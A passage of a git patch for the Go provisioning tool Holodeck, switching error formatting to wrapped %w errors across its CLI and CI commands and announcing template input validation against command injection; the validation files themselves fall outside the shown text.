From fba9ce39d683434386cbd167bba73baa0d7eedb7 Mon Sep 17 00:00:00 2001 From: Carlos Eduardo Arango Gutierrez Date: Mon, 9 Feb 2026 14:28:04 +0100 Subject: [PATCH] =?UTF-8?q?fix:=20security=20and=20concurrency=20=E2=80=94?= =?UTF-8?q?=20template=20input=20validation,=20error=20wrapping?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Add template input validation to prevent command injection via shell metacharacters in version strings, git URLs, and user-supplied fields - Replace fmt.Errorf %v with %w across non-vendor packages for proper error chain propagation enabling errors.Is/errors.As usage Re-implemented against current upstream/main. Signed-off-by: Carlos Eduardo Arango Gutierrez Co-authored-by: Cursor Signed-off-by: Carlos Eduardo Arango Gutierrez Co-authored-by: Cursor Signed-off-by: Carlos Eduardo Arango Gutierrez Co-authored-by: Cursor --- cmd/action/ci/ci.go | 12 +- cmd/action/ci/cleanup.go | 14 +-- cmd/action/ci/entrypoint.go | 10 +- cmd/action/ci/provider.go | 6 +- cmd/action/ci/vpc_cleanup.go | 2 +- cmd/cli/cleanup/cleanup.go | 4 +- cmd/cli/common/host.go | 6 +- cmd/cli/create/create.go | 28 ++--- cmd/cli/delete/delete.go | 4 +- cmd/cli/describe/describe.go | 4 +- cmd/cli/dryrun/dryrun.go | 6 +- cmd/cli/get/get.go | 18 +-- cmd/cli/list/list.go | 2 +- cmd/cli/scp/scp.go | 28 ++--- cmd/cli/ssh/ssh.go | 10 +- cmd/cli/status/status.go | 2 +- cmd/cli/update/update.go | 22 ++-- internal/instances/instances.go | 18 +-- pkg/provider/aws/cluster.go | 4 +- pkg/provider/aws/delete.go | 4 +- pkg/provider/aws/nlb.go | 18 +-- pkg/provisioner/provisioner.go | 5 + pkg/provisioner/templates/validate.go | 133 +++++++++++++++++++++ pkg/provisioner/templates/validate_test.go | 130 ++++++++++++++++++++ 24 files changed, 379 insertions(+), 111 deletions(-) create mode 100644 pkg/provisioner/templates/validate.go create mode 100644 pkg/provisioner/templates/validate_test.go diff --git a/cmd/action/ci/ci.go b/cmd/action/ci/ci.go index 0929d300a..d49d420c1 100644 --- a/cmd/action/ci/ci.go +++ b/cmd/action/ci/ci.go @@ -76,7 +76,7 @@ func readInputs() error { if awsSshKey != "" { err := os.Setenv("AWS_SSH_KEY", awsSshKey) if err != nil { - return fmt.Errorf("failed to set AWS_SSH_KEY: %v", err) + return fmt.Errorf("failed to set AWS_SSH_KEY: %w", err) } } // Map INPUT_AWS_ACCESS_KEY_ID and INPUT_AWS_SECRET_ACCESS_KEY @@ -85,14 +85,14 @@ func readInputs() error { if accessKeyID != "" { err := os.Setenv("AWS_ACCESS_KEY_ID", accessKeyID) if err != nil { - return fmt.Errorf("failed to set AWS_ACCESS_KEY_ID: %v", err) + return fmt.Errorf("failed to set AWS_ACCESS_KEY_ID: %w", err) } } secretAccessKey := os.Getenv("INPUT_AWS_SECRET_ACCESS_KEY") if secretAccessKey != "" { err := os.Setenv("AWS_SECRET_ACCESS_KEY", secretAccessKey) if err != nil { - return fmt.Errorf("failed to set AWS_SECRET_ACCESS_KEY: %v", err) + return fmt.Errorf("failed to set AWS_SECRET_ACCESS_KEY: %w", err) } } @@ -101,7 +101,7 @@ func readInputs() error { if vsphereSshKey != "" { err := os.Setenv("VSPHERE_SSH_KEY", vsphereSshKey) if err != nil { - return fmt.Errorf("failed to set VSPHERE_SSH_KEY: %v", err) + return fmt.Errorf("failed to set VSPHERE_SSH_KEY: %w", err) } } // Map INPUT_VSPHERE_USERNAME and INPUT_VSPHERE_PASSWORD @@ -110,14 +110,14 @@ func readInputs() error { if vsphereUsername != "" { err := os.Setenv("HOLODECK_VCENTER_USERNAME", vsphereUsername) if err != nil { - return fmt.Errorf("failed to set HOLODECK_VCENTER_USERNAME: %v", err) + return fmt.Errorf("failed to set HOLODECK_VCENTER_USERNAME: %w", err) } } vspherePassword := os.Getenv("INPUT_VSPHERE_PASSWORD") if vspherePassword != "" { err := os.Setenv("HOLODECK_VCENTER_PASSWORD", vspherePassword) if err != nil { - return fmt.Errorf("failed to set HOLODECK_VCENTER_PASSWORD: %v", err) + return fmt.Errorf("failed to set HOLODECK_VCENTER_PASSWORD: %w", err) } } diff --git a/cmd/action/ci/cleanup.go b/cmd/action/ci/cleanup.go index ed88c8745..1afdf73c0 100644 --- a/cmd/action/ci/cleanup.go +++ b/cmd/action/ci/cleanup.go @@ -39,7 +39,7 @@ func cleanup(log *logger.FunLogger) error { configFile = "/github/workspace/" + configFile cfg, err := jyaml.UnmarshalFromFile[v1alpha1.Environment](configFile) if err != nil { - return fmt.Errorf("error reading config file: %s", err) + return fmt.Errorf("error reading config file: %w", err) } // Set env name @@ -54,7 +54,7 @@ func cleanup(log *logger.FunLogger) error { provider, err := newProvider(log, &cfg) if err != nil { - return fmt.Errorf("failed to create provider: %v", err) + return fmt.Errorf("failed to create provider: %w", err) } if err := provider.Delete(); err != nil { @@ -66,13 +66,13 @@ func cleanup(log *logger.FunLogger) error { // if kubeconfig exists, delete it if _, err := os.Stat(kubeconfig); err == nil { if err := os.Remove(kubeconfig); err != nil { - log.Error(fmt.Errorf("error deleting kubeconfig: %s", err)) + log.Error(fmt.Errorf("error deleting kubeconfig: %w", err)) } } if _, err := os.Stat(sshKeyFile); err == nil { if err := os.Remove(sshKeyFile); err != nil { - log.Error(fmt.Errorf("error deleting ssh key: %s", err)) + log.Error(fmt.Errorf("error deleting ssh key: %w", err)) } } @@ -93,17 +93,17 @@ func isTerminated(log *logger.FunLogger) (bool, error) { configFile = "/github/workspace/" + configFile cfg, err := jyaml.UnmarshalFromFile[v1alpha1.Environment](configFile) if err != nil { - return false, fmt.Errorf("error reading config file: %s", err) + return false, fmt.Errorf("error reading config file: %w", err) } provider, err := newProvider(log, &cfg) if err != nil { - return false, fmt.Errorf("failed to create provider: %v", err) + return false, fmt.Errorf("failed to create provider: %w", err) } status, err := provider.Status() if err != nil { - return false, fmt.Errorf("failed to get status: %v", err) + return false, fmt.Errorf("failed to get status: %w", err) } for _, s := range status { diff --git a/cmd/action/ci/entrypoint.go b/cmd/action/ci/entrypoint.go index 14140b50b..b9c0adf53 100644 --- a/cmd/action/ci/entrypoint.go +++ b/cmd/action/ci/entrypoint.go @@ -41,7 +41,7 @@ func entrypoint(log *logger.FunLogger) error { // Read the config file cfg, err := jyaml.UnmarshalFromFile[v1alpha1.Environment](configFile) if err != nil { - return fmt.Errorf("error reading config file: %s", err) + return fmt.Errorf("error reading config file: %w", err) } // If no containerruntime is specified, default to none if cfg.Spec.ContainerRuntime.Name == "" { @@ -53,7 +53,7 @@ func entrypoint(log *logger.FunLogger) error { provider, err := newProvider(log, &cfg) if err != nil { - return fmt.Errorf("failed to create provider: %v", err) + return fmt.Errorf("failed to create provider: %w", err) } err = provider.Create() @@ -64,7 +64,7 @@ func entrypoint(log *logger.FunLogger) error { // Read cache after creating the environment cache, err := jyaml.UnmarshalFromFile[v1alpha1.Environment](cacheFile) if err != nil { - return fmt.Errorf("failed to read cache file: %v", err) + return fmt.Errorf("failed to read cache file: %w", err) } // Get the host url @@ -92,13 +92,13 @@ func entrypoint(log *logger.FunLogger) error { log.Info("Provisioning \u2699") if err = p.Run(cfg); err != nil { - return fmt.Errorf("failed to run provisioner: %v", err) + return fmt.Errorf("failed to run provisioner: %w", err) } if cfg.Spec.Kubernetes.Install { err = utils.GetKubeConfig(log, &cfg, hostUrl, kubeconfig) if err != nil { - return fmt.Errorf("failed to get kubeconfig: %v", err) + return fmt.Errorf("failed to get kubeconfig: %w", err) } } diff --git a/cmd/action/ci/provider.go b/cmd/action/ci/provider.go index babd5e42e..c16318a36 100644 --- a/cmd/action/ci/provider.go +++ b/cmd/action/ci/provider.go @@ -48,7 +48,7 @@ func newAwsProvider(log *logger.FunLogger, cfg *v1alpha1.Environment) (*aws.Prov if _, err := os.Stat(cachedir); os.IsNotExist(err) { err := os.Mkdir(cachedir, 0750) if err != nil { - log.Error(fmt.Errorf("error creating cache directory: %s", err)) + log.Error(fmt.Errorf("error creating cache directory: %w", err)) return nil, err } } @@ -77,14 +77,14 @@ func getSSHKeyFile(log *logger.FunLogger, envKey string) error { } err := os.WriteFile(sshKeyFile, []byte(envSshKey), 0600) if err != nil { - log.Error(fmt.Errorf("error writing ssh key to file: %s", err)) + log.Error(fmt.Errorf("error writing ssh key to file: %w", err)) return err } } else { // copy file to sshKeyFile err := os.Rename(holodeckSSHKeyFile, sshKeyFile) if err != nil { - log.Error(fmt.Errorf("error copying ssh key file: %s", err)) + log.Error(fmt.Errorf("error copying ssh key file: %w", err)) return err } } diff --git a/cmd/action/ci/vpc_cleanup.go b/cmd/action/ci/vpc_cleanup.go index 73df74dd9..a913f131d 100644 --- a/cmd/action/ci/vpc_cleanup.go +++ b/cmd/action/ci/vpc_cleanup.go @@ -94,7 +94,7 @@ func RunCleanup(log *logger.FunLogger) error { } if cleanupErr != nil { - log.Error(fmt.Errorf("failed to cleanup VPC %s: %v", vpcID, cleanupErr)) + log.Error(fmt.Errorf("failed to cleanup VPC %s: %w", vpcID, cleanupErr)) failCount++ } else { log.Info("Successfully cleaned up VPC %s", vpcID) diff --git a/cmd/cli/cleanup/cleanup.go b/cmd/cli/cleanup/cleanup.go index ccdf70393..6a872db3c 100644 --- a/cmd/cli/cleanup/cleanup.go +++ b/cmd/cli/cleanup/cleanup.go @@ -179,9 +179,9 @@ func (m *command) run(c *cli.Context) error { if cleanupErr != nil { if ctx.Err() != nil { - m.log.Error(fmt.Errorf("cleanup of VPC %s was cancelled: %v", vpcID, cleanupErr)) + m.log.Error(fmt.Errorf("cleanup of VPC %s was cancelled: %w", vpcID, cleanupErr)) } else { - m.log.Error(fmt.Errorf("failed to cleanup VPC %s: %v", vpcID, cleanupErr)) + m.log.Error(fmt.Errorf("failed to cleanup VPC %s: %w", vpcID, cleanupErr)) } failCount++ } else { diff --git a/cmd/cli/common/host.go b/cmd/cli/common/host.go index f99b9c873..d37f0754b 100644 --- a/cmd/cli/common/host.go +++ b/cmd/cli/common/host.go @@ -87,12 +87,12 @@ const ( func ConnectSSH(log *logger.FunLogger, keyPath, userName, hostUrl string) (*ssh.Client, error) { key, err := os.ReadFile(keyPath) //nolint:gosec // keyPath is from trusted env config if err != nil { - return nil, fmt.Errorf("failed to read key file %s: %v", keyPath, err) + return nil, fmt.Errorf("failed to read key file %s: %w", keyPath, err) } signer, err := ssh.ParsePrivateKey(key) if err != nil { - return nil, fmt.Errorf("failed to parse private key: %v", err) + return nil, fmt.Errorf("failed to parse private key: %w", err) } config := &ssh.ClientConfig{ @@ -116,5 +116,5 @@ func ConnectSSH(log *logger.FunLogger, keyPath, userName, hostUrl string) (*ssh. time.Sleep(sshRetryDelay) } - return nil, fmt.Errorf("failed to connect after %d attempts: %v", sshMaxRetries, err) + return nil, fmt.Errorf("failed to connect after %d attempts: %w", sshMaxRetries, err) } diff --git a/cmd/cli/create/create.go b/cmd/cli/create/create.go index 34130aada..ada93d73d 100644 --- a/cmd/cli/create/create.go +++ b/cmd/cli/create/create.go @@ -108,7 +108,7 @@ func (m command) build() *cli.Command { var err error opts.cfg, err = jyaml.UnmarshalFromFile[v1alpha1.Environment](opts.envFile) if err != nil { - return fmt.Errorf("error reading config file: %s", err) + return fmt.Errorf("error reading config file: %w", err) } // if no containerruntime is specified, default to none @@ -184,7 +184,7 @@ func (m command) run(c *cli.Context, opts *options) error { // Read cache after creating the environment opts.cache, err = jyaml.UnmarshalFromFile[v1alpha1.Environment](opts.cacheFile) if err != nil { - return fmt.Errorf("failed to read cache file: %v", err) + return fmt.Errorf("failed to read cache file: %w", err) } if opts.provision { @@ -443,22 +443,22 @@ func runSingleNodeProvision(log *logger.FunLogger, opts *options) error { } data, err := jyaml.MarshalYAML(opts.cfg) if err != nil { - return fmt.Errorf("failed to marshal environment: %v", err) + return fmt.Errorf("failed to marshal environment: %w", err) } if err := os.WriteFile(opts.cacheFile, data, 0600); err != nil { - return fmt.Errorf("failed to update cache file with provisioning status: %v", err) + return fmt.Errorf("failed to update cache file with provisioning status: %w", err) } - return fmt.Errorf("failed to run provisioner: %v", err) + return fmt.Errorf("failed to run provisioner: %w", err) } // Set provisioning status to true after successful provisioning opts.cfg.Labels[instances.InstanceProvisionedLabelKey] = "true" data, err := jyaml.MarshalYAML(opts.cfg) if err != nil { - return fmt.Errorf("failed to marshal environment: %v", err) + return fmt.Errorf("failed to marshal environment: %w", err) } if err := os.WriteFile(opts.cacheFile, data, 0600); err != nil { - return fmt.Errorf("failed to update cache file with provisioning status: %v", err) + return fmt.Errorf("failed to update cache file with provisioning status: %w", err) } // Download kubeconfig @@ -476,7 +476,7 @@ func runSingleNodeProvision(log *logger.FunLogger, opts *options) error { } } if err = utils.GetKubeConfig(log, &opts.cache, hostUrl, opts.kubeconfig); err != nil { - return fmt.Errorf("failed to get kubeconfig: %v", err) + return fmt.Errorf("failed to get kubeconfig: %w", err) } } @@ -524,22 +524,22 @@ func runMultinodeProvision(log *logger.FunLogger, opts *options) error { } data, err := jyaml.MarshalYAML(opts.cfg) if err != nil { - return fmt.Errorf("failed to marshal environment: %v", err) + return fmt.Errorf("failed to marshal environment: %w", err) } if err := os.WriteFile(opts.cacheFile, data, 0600); err != nil { - return fmt.Errorf("failed to update cache file with provisioning status: %v", err) + return fmt.Errorf("failed to update cache file with provisioning status: %w", err) } - return fmt.Errorf("failed to provision multinode cluster: %v", err) + return fmt.Errorf("failed to provision multinode cluster: %w", err) } // Set provisioning status to true after successful provisioning opts.cfg.Labels[instances.InstanceProvisionedLabelKey] = "true" data, err := jyaml.MarshalYAML(opts.cfg) if err != nil { - return fmt.Errorf("failed to marshal environment: %v", err) + return fmt.Errorf("failed to marshal environment: %w", err) } if err := os.WriteFile(opts.cacheFile, data, 0600); err != nil { - return fmt.Errorf("failed to update cache file with provisioning status: %v", err) + return fmt.Errorf("failed to update cache file with provisioning status: %w", err) } // Download kubeconfig from first control-plane node @@ -554,7 +554,7 @@ func runMultinodeProvision(log *logger.FunLogger, opts *options) error { } if hostUrl != "" { if err := utils.GetKubeConfig(log, &opts.cache, hostUrl, opts.kubeconfig); err != nil { - return fmt.Errorf("failed to get kubeconfig: %v", err) + return fmt.Errorf("failed to get kubeconfig: %w", err) } } } diff --git a/cmd/cli/delete/delete.go b/cmd/cli/delete/delete.go index 1e6dd3e43..2f2bb947c 100644 --- a/cmd/cli/delete/delete.go +++ b/cmd/cli/delete/delete.go @@ -73,12 +73,12 @@ func (m command) run(c *cli.Context) error { // First check if the instance exists instance, err := manager.GetInstance(instanceID) if err != nil { - return fmt.Errorf("failed to get instance %s: %v", instanceID, err) + return fmt.Errorf("failed to get instance %s: %w", instanceID, err) } // Delete the instance if err := manager.DeleteInstance(instanceID); err != nil { - return fmt.Errorf("failed to delete instance %s: %v", instanceID, err) + return fmt.Errorf("failed to delete instance %s: %w", instanceID, err) } m.log.Info("Successfully deleted instance %s (%s)", instanceID, instance.Name) diff --git a/cmd/cli/describe/describe.go b/cmd/cli/describe/describe.go index 80f7b531b..434c69019 100644 --- a/cmd/cli/describe/describe.go +++ b/cmd/cli/describe/describe.go @@ -239,13 +239,13 @@ func (m command) run(instanceID string) error { manager := instances.NewManager(m.log, m.cachePath) instance, err := manager.GetInstance(instanceID) if err != nil { - return fmt.Errorf("failed to get instance: %v", err) + return fmt.Errorf("failed to get instance: %w", err) } // Load environment env, err := jyaml.UnmarshalFromFile[v1alpha1.Environment](instance.CacheFile) if err != nil { - return fmt.Errorf("failed to read environment: %v", err) + return fmt.Errorf("failed to read environment: %w", err) } age := time.Since(instance.CreatedAt).Round(time.Second) diff --git a/cmd/cli/dryrun/dryrun.go b/cmd/cli/dryrun/dryrun.go index eff3e8bf2..a3f19e638 100644 --- a/cmd/cli/dryrun/dryrun.go +++ b/cmd/cli/dryrun/dryrun.go @@ -69,7 +69,7 @@ func (m command) build() *cli.Command { var err error opts.cfg, err = jyaml.UnmarshalFromFile[v1alpha1.Environment](opts.envFile) if err != nil { - return fmt.Errorf("failed to read config file %s: %v", opts.envFile, err) + return fmt.Errorf("failed to read config file %s: %w", opts.envFile, err) } return nil @@ -132,11 +132,11 @@ func connectOrDie(keyPath, userName, hostUrl string) error { var err error key, err := os.ReadFile(keyPath) // nolint:gosec if err != nil { - return fmt.Errorf("failed to read key file: %v", err) + return fmt.Errorf("failed to read key file: %w", err) } signer, err := ssh.ParsePrivateKey(key) if err != nil { - return fmt.Errorf("failed to parse private key: %v", err) + return fmt.Errorf("failed to parse private key: %w", err) } sshConfig := &ssh.ClientConfig{ User: userName, diff --git a/cmd/cli/get/get.go b/cmd/cli/get/get.go index 6ec815371..4a80d157d 100644 --- a/cmd/cli/get/get.go +++ b/cmd/cli/get/get.go @@ -146,13 +146,13 @@ func (m command) runKubeconfig(instanceID string) error { manager := instances.NewManager(m.log, m.cachePath) instance, err := manager.GetInstance(instanceID) if err != nil { - return fmt.Errorf("failed to get instance: %v", err) + return fmt.Errorf("failed to get instance: %w", err) } // Load environment env, err := jyaml.UnmarshalFromFile[v1alpha1.Environment](instance.CacheFile) if err != nil { - return fmt.Errorf("failed to read environment: %v", err) + return fmt.Errorf("failed to read environment: %w", err) } // Check if Kubernetes is installed @@ -163,7 +163,7 @@ func (m command) runKubeconfig(instanceID string) error { // Determine host URL hostUrl, err := common.GetHostURL(&env, m.node, true) if err != nil { - return fmt.Errorf("failed to get host URL: %v", err) + return fmt.Errorf("failed to get host URL: %w", err) } // Determine output path @@ -171,18 +171,18 @@ func (m command) runKubeconfig(instanceID string) error { if outputPath == "" { homeDir, err := os.UserHomeDir() if err != nil { - return fmt.Errorf("failed to get home directory: %v", err) + return fmt.Errorf("failed to get home directory: %w", err) } kubeDir := filepath.Join(homeDir, ".kube") if err := os.MkdirAll(kubeDir, 0750); err != nil { - return fmt.Errorf("failed to create .kube directory: %v", err) + return fmt.Errorf("failed to create .kube directory: %w", err) } outputPath = filepath.Join(kubeDir, fmt.Sprintf("config-%s", instanceID)) } // Download kubeconfig if err := utils.GetKubeConfig(m.log, &env, hostUrl, outputPath); err != nil { - return fmt.Errorf("failed to download kubeconfig: %v", err) + return fmt.Errorf("failed to download kubeconfig: %w", err) } m.log.Info("Kubeconfig saved to: %s", outputPath) @@ -197,13 +197,13 @@ func (m command) runSSHConfig(instanceID string) error { manager := instances.NewManager(m.log, m.cachePath) instance, err := manager.GetInstance(instanceID) if err != nil { - return fmt.Errorf("failed to get instance: %v", err) + return fmt.Errorf("failed to get instance: %w", err) } // Load environment env, err := jyaml.UnmarshalFromFile[v1alpha1.Environment](instance.CacheFile) if err != nil { - return fmt.Errorf("failed to read environment: %v", err) + return fmt.Errorf("failed to read environment: %w", err) } userName := env.Spec.Username @@ -220,7 +220,7 @@ func (m command) runSSHConfig(instanceID string) error { // Single node hostUrl, err := common.GetHostURL(&env, m.node, false) if err != nil { - return fmt.Errorf("failed to get host URL: %v", err) + return fmt.Errorf("failed to get host URL: %w", err) } fmt.Printf("# Holodeck instance: %s\n", instanceID) diff --git a/cmd/cli/list/list.go b/cmd/cli/list/list.go index 380633c56..c64a441ab 100644 --- a/cmd/cli/list/list.go +++ b/cmd/cli/list/list.go @@ -133,7 +133,7 @@ func (m *command) run(c *cli.Context) error { manager := instances.NewManager(m.log, m.cachePath) instList, err := manager.ListInstances() if err != nil { - return fmt.Errorf("failed to list instances: %v", err) + return fmt.Errorf("failed to list instances: %w", err) } if len(instList) == 0 { diff --git a/cmd/cli/scp/scp.go b/cmd/cli/scp/scp.go index 3940e06d3..2a05f1a5d 100644 --- a/cmd/cli/scp/scp.go +++ b/cmd/cli/scp/scp.go @@ -150,19 +150,19 @@ func (m command) run(src, dst string) error { manager := instances.NewManager(m.log, m.cachePath) instance, err := manager.GetInstance(instanceID) if err != nil { - return fmt.Errorf("failed to get instance: %v", err) + return fmt.Errorf("failed to get instance: %w", err) } // Load environment for SSH details env, err := jyaml.UnmarshalFromFile[v1alpha1.Environment](instance.CacheFile) if err != nil { - return fmt.Errorf("failed to read environment: %v", err) + return fmt.Errorf("failed to read environment: %w", err) } // Determine host URL hostUrl, err := common.GetHostURL(&env, m.node, true) if err != nil { - return fmt.Errorf("failed to get host URL: %v", err) + return fmt.Errorf("failed to get host URL: %w", err) } // Get SSH credentials @@ -175,13 +175,13 @@ func (m command) run(src, dst string) error { // Create SSH and SFTP clients sshClient, err := common.ConnectSSH(m.log, keyPath, userName, hostUrl) if err != nil { - return fmt.Errorf("failed to connect: %v", err) + return fmt.Errorf("failed to connect: %w", err) } defer sshClient.Close() //nolint:errcheck sftpClient, err := sftp.NewClient(sshClient) if err != nil { - return fmt.Errorf("failed to create SFTP client: %v", err) + return fmt.Errorf("failed to create SFTP client: %w", err) } defer sftpClient.Close() //nolint:errcheck @@ -195,7 +195,7 @@ func (m command) run(src, dst string) error { func (m command) copyToRemote(client *sftp.Client, localPath, remotePath string) error { info, err := os.Stat(localPath) if err != nil { - return fmt.Errorf("failed to stat local path: %v", err) + return fmt.Errorf("failed to stat local path: %w", err) } if info.IsDir() { @@ -212,7 +212,7 @@ func (m command) copyFileToRemote(client *sftp.Client, localPath, remotePath str // Open local file localFile, err := os.Open(localPath) //nolint:gosec // localPath is user-provided CLI arg if err != nil { - return fmt.Errorf("failed to open local file: %v", err) + return fmt.Errorf("failed to open local file: %w", err) } defer localFile.Close() //nolint:errcheck @@ -223,14 +223,14 @@ func (m command) copyFileToRemote(client *sftp.Client, localPath, remotePath str // Create remote file remoteFile, err := client.Create(remotePath) if err != nil { - return fmt.Errorf("failed to create remote file: %v", err) + return fmt.Errorf("failed to create remote file: %w", err) } defer remoteFile.Close() //nolint:errcheck // Copy content bytes, err := io.Copy(remoteFile, localFile) if err != nil { - return fmt.Errorf("failed to copy file: %v", err) + return fmt.Errorf("failed to copy file: %w", err) } m.log.Info("Copied %s -> %s (%d bytes)", localPath, remotePath, bytes) @@ -262,7 +262,7 @@ func (m command) copyDirToRemote(client *sftp.Client, localPath, remotePath stri func (m command) copyFromRemote(client *sftp.Client, remotePath, localPath string) error { info, err := client.Stat(remotePath) if err != nil { - return fmt.Errorf("failed to stat remote path: %v", err) + return fmt.Errorf("failed to stat remote path: %w", err) } if info.IsDir() { @@ -279,27 +279,27 @@ func (m command) copyFileFromRemote(client *sftp.Client, remotePath, localPath s // Open remote file remoteFile, err := client.Open(remotePath) if err != nil { - return fmt.Errorf("failed to open remote file: %v", err) + return fmt.Errorf("failed to open remote file: %w", err) } defer remoteFile.Close() //nolint:errcheck // Ensure local directory exists localDir := filepath.Dir(localPath) if err := os.MkdirAll(localDir, 0750); err != nil { - return fmt.Errorf("failed to create local directory: %v", err) + return fmt.Errorf("failed to create local directory: %w", err) } // Create local file localFile, err := os.Create(localPath) //nolint:gosec // localPath is user-provided CLI arg if err != nil { - return fmt.Errorf("failed to create local file: %v", err) + return fmt.Errorf("failed to create local file: %w", err) } defer localFile.Close() //nolint:errcheck // Copy content bytes, err := io.Copy(localFile, remoteFile) if err != nil { - return fmt.Errorf("failed to copy file: %v", err) + return fmt.Errorf("failed to copy file: %w", err) } m.log.Info("Copied %s -> %s (%d bytes)", remotePath, localPath, bytes) diff --git a/cmd/cli/ssh/ssh.go b/cmd/cli/ssh/ssh.go index 601260d6e..8f7bb4f8f 100644 --- a/cmd/cli/ssh/ssh.go +++ b/cmd/cli/ssh/ssh.go @@ -112,19 +112,19 @@ func (m command) run(instanceID string, remoteCmd []string) error { manager := instances.NewManager(m.log, m.cachePath) instance, err := manager.GetInstance(instanceID) if err != nil { - return fmt.Errorf("failed to get instance: %v", err) + return fmt.Errorf("failed to get instance: %w", err) } // Load environment for SSH details env, err := jyaml.UnmarshalFromFile[v1alpha1.Environment](instance.CacheFile) if err != nil { - return fmt.Errorf("failed to read environment: %v", err) + return fmt.Errorf("failed to read environment: %w", err) } // Determine host URL hostUrl, err := common.GetHostURL(&env, m.node, true) if err != nil { - return fmt.Errorf("failed to get host URL: %v", err) + return fmt.Errorf("failed to get host URL: %w", err) } // Get SSH credentials from environment @@ -142,7 +142,7 @@ func (m command) run(instanceID string, remoteCmd []string) error { // For command execution, use Go SSH library client, err := common.ConnectSSH(m.log, keyPath, userName, hostUrl) if err != nil { - return fmt.Errorf("failed to connect: %v", err) + return fmt.Errorf("failed to connect: %w", err) } defer client.Close() //nolint:errcheck @@ -152,7 +152,7 @@ func (m command) run(instanceID string, remoteCmd []string) error { func (m command) runCommand(client *ssh.Client, cmd []string) error { session, err := client.NewSession() if err != nil { - return fmt.Errorf("failed to create session: %v", err) + return fmt.Errorf("failed to create session: %w", err) } defer session.Close() //nolint:errcheck diff --git a/cmd/cli/status/status.go b/cmd/cli/status/status.go index 0aefe38da..b2598ccdf 100644 --- a/cmd/cli/status/status.go +++ b/cmd/cli/status/status.go @@ -161,7 +161,7 @@ func (m command) run(c *cli.Context, instanceID string) error { // Try to get the instance by filename (for old cache files) instance, err = manager.GetInstanceByFilename(instanceID) if err != nil { - return fmt.Errorf("failed to get instance: %v", err) + return fmt.Errorf("failed to get instance: %w", err) } } diff --git a/cmd/cli/update/update.go b/cmd/cli/update/update.go index 4e11b2b99..07ebb9ba8 100644 --- a/cmd/cli/update/update.go +++ b/cmd/cli/update/update.go @@ -199,13 +199,13 @@ func (m *command) run(c *cli.Context, instanceID string) error { manager := instances.NewManager(m.log, m.cachePath) instance, err := manager.GetInstance(instanceID) if err != nil { - return fmt.Errorf("failed to get instance: %v", err) + return fmt.Errorf("failed to get instance: %w", err) } // Load environment env, err := jyaml.UnmarshalFromFile[v1alpha1.Environment](instance.CacheFile) if err != nil { - return fmt.Errorf("failed to read environment: %v", err) + return fmt.Errorf("failed to read environment: %w", err) } // Track if we need to reprovision @@ -310,15 +310,15 @@ func (m *command) run(c *cli.Context, instanceID string) error { // Save config first so provisioner reads updated values data, err := jyaml.MarshalYAML(env) if err != nil { - return fmt.Errorf("failed to marshal environment: %v", err) + return fmt.Errorf("failed to marshal environment: %w", err) } if err := os.WriteFile(instance.CacheFile, data, 0600); err != nil { - return fmt.Errorf("failed to update cache file: %v", err) + return fmt.Errorf("failed to update cache file: %w", err) } m.log.Info("Running provisioning...") if err := m.runProvision(&env); err != nil { - return fmt.Errorf("provisioning failed: %v", err) + return fmt.Errorf("provisioning failed: %w", err) } // Mark as provisioned and save again @@ -328,10 +328,10 @@ func (m *command) run(c *cli.Context, instanceID string) error { env.Labels[instances.InstanceProvisionedLabelKey] = "true" data, err = jyaml.MarshalYAML(env) if err != nil { - return fmt.Errorf("failed to marshal environment: %v", err) + return fmt.Errorf("failed to marshal environment: %w", err) } if err := os.WriteFile(instance.CacheFile, data, 0600); err != nil { - return fmt.Errorf("failed to update cache file: %v", err) + return fmt.Errorf("failed to update cache file: %w", err) } m.log.Info("Provisioning completed successfully") @@ -339,10 +339,10 @@ func (m *command) run(c *cli.Context, instanceID string) error { // Only write if config changed but no provisioning needed data, err := jyaml.MarshalYAML(env) if err != nil { - return fmt.Errorf("failed to marshal environment: %v", err) + return fmt.Errorf("failed to marshal environment: %w", err) } if err := os.WriteFile(instance.CacheFile, data, 0600); err != nil { - return fmt.Errorf("failed to update cache file: %v", err) + return fmt.Errorf("failed to update cache file: %w", err) } m.log.Info("Configuration updated") } @@ -362,12 +362,12 @@ func (m *command) runProvision(env *v1alpha1.Environment) error { // Single node - use shared host URL resolution hostUrl, err := common.GetHostURL(env, "", false) if err != nil { - return fmt.Errorf("failed to determine host URL: %v", err) + return fmt.Errorf("failed to determine host URL: %w", err) } p, err := provisioner.New(m.log, env.Spec.PrivateKey, env.Spec.Username, hostUrl) if err != nil { - return fmt.Errorf("failed to create provisioner: %v", err) + return fmt.Errorf("failed to create provisioner: %w", err) } defer p.Client.Close() //nolint:errcheck diff --git a/internal/instances/instances.go b/internal/instances/instances.go index 6c2732b35..11b70f2bc 100644 --- a/internal/instances/instances.go +++ b/internal/instances/instances.go @@ -156,7 +156,7 @@ func (m *Manager) ListInstances() ([]Instance, error) { // Read all cache files files, err := os.ReadDir(m.cachePath) if err != nil { - return nil, fmt.Errorf("failed to read cache directory: %v", err) + return nil, fmt.Errorf("failed to read cache directory: %w", err) } for _, file := range files { @@ -238,12 +238,12 @@ func (m *Manager) GetInstance(instanceID string) (*Instance, error) { env, err := jyaml.UnmarshalFromFile[v1alpha1.Environment](cacheFile) if err != nil { - return nil, fmt.Errorf("failed to read cache file: %v", err) + return nil, fmt.Errorf("failed to read cache file: %w", err) } fileInfo, err := os.Stat(cacheFile) if err != nil { - return nil, fmt.Errorf("failed to get file info: %v", err) + return nil, fmt.Errorf("failed to get file info: %w", err) } // Get instance status from provider @@ -288,7 +288,7 @@ func (m *Manager) DeleteInstance(instanceID string) error { env, err := jyaml.UnmarshalFromFile[v1alpha1.Environment](cacheFile) if err != nil { - return fmt.Errorf("failed to read cache file: %v", err) + return fmt.Errorf("failed to read cache file: %w", err) } // Delete resources based on provider @@ -296,10 +296,10 @@ func (m *Manager) DeleteInstance(instanceID string) error { case v1alpha1.ProviderAWS: client, err := aws.New(m.log, env, cacheFile) if err != nil { - return fmt.Errorf("failed to create AWS provider: %v", err) + return fmt.Errorf("failed to create AWS provider: %w", err) } if err := client.Delete(); err != nil { - return fmt.Errorf("failed to delete AWS resources: %v", err) + return fmt.Errorf("failed to delete AWS resources: %w", err) } case v1alpha1.ProviderSSH: m.log.Info("SSH infrastructure cleanup not implemented") @@ -307,7 +307,7 @@ func (m *Manager) DeleteInstance(instanceID string) error { // Remove cache file if err := os.Remove(cacheFile); err != nil { - return fmt.Errorf("failed to remove cache file: %v", err) + return fmt.Errorf("failed to remove cache file: %w", err) } return nil @@ -319,12 +319,12 @@ func (m 